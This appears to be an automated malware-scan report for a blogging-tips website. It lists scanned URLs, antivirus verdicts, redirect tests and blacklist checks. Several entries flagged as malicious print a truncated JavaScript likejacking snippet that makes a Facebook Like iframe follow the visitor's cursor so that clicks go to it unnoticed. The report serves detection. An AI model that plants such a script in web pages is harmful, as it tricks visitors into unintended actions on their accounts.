Scanned pages/files
| Request | Server response | Status |
http://www.problogbooster.com/2013/08/unfortunately-touchwiz-home-has-stopped.html | 200 OK Content-Length: 224896 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com//pagead2.googlesyndication.com/pagead/show_ads.js/ | 404 Not Found Content-Length: 213877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 200 OK Content-Length: 28331 Content-Type: text/javascript | clean |
https://www.blogger.com/static/v1/widgets/3512243057-widgets.js | 200 OK Content-Length: 90257 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12850 Content-Type: application/javascript | clean |
http://www.problogbooster.com/ | 200 OK Content-Length: 280061 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://contextual.media.net/nmedianet.js?cid=8CUCTYKUQ | 200 OK Content-Length: 68516 Content-Type: text/javascript | clean |
http://www.problogbooster.com/search/label/How%20to | 200 OK Content-Length: 302606 Content-Type: text/html | clean |
http://www.problogbooster.com/search/label/Facebook | 200 OK Content-Length: 274699 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/2008/10/contact-me.html | 200 OK Content-Length: 221854 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/2008/10/ | 200 OK Content-Length: 206009 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/feeds/posts/default | HTTP/1.1 302 Moved Temporarily Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 Connection: close Date: Tue, 17 Feb 2015 14:11:37 GMT Accept-Ranges: none Location: http://feeds.feedburner.com/problogbooster Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Tue, 17 Feb 2015 14:11:38 GMT Alternate-Protocol: 80:quic,p=0.08,80:quic,p=0.08 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://feeds.feedburner.com/problogbooster | 200 OK Content-Length: 239169 Content-Type: text/xml | clean |
http://feeds.feedburner.com/test404page.js | 404 Not Found Content-Length: 1818 Content-Type: text/html | clean |
http://www.problogbooster.com//www.blogger.com/rearrange?blogID=4537507592189321213&widgetType=HTML&widgetId=HTML17&action=editWidget§ionId=sidebar/ | 404 Not Found Content-Length: 214302 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ var Xcord = 0, Ycord = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var lbox = document.createElement('iframe'); lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'http://www.facebook.com/problogbooster') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80'; lbox.scrolling = 'n function mouseMove(e) { if (IE) { Xcord = event.clientX + document.body.scrollLeft; Ycord = event.clientY + document.body.scrollTop; } else { Xcord = e.pageX; Ycord = e.pageY; } if (Xcord < 0) Xcord = 0; if (Ycord < 0) Ycord = 0; lbox.style.top = (Ycord - 8) + 'px'; lbox.style.left = (Xcord - 25) + 'px'; return true } })(); Antivirus reports:
| ||
http://www.problogbooster.com/search/label/Blogging%20Tips | 200 OK Content-Length: 300647 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: problogbooster.com
Result:
GET / HTTP/1.1
Host: problogbooster.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: problogbooster.com
Referer: http://www.google.com/search?q=problogbooster.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: problogbooster.com
Referer: http://www.google.com/search?q=problogbooster.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=problogbooster.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://problogbooster.com/
Result: problogbooster.com is not infected or malware details are not published yet.
Result: problogbooster.com is not infected or malware details are not published yet.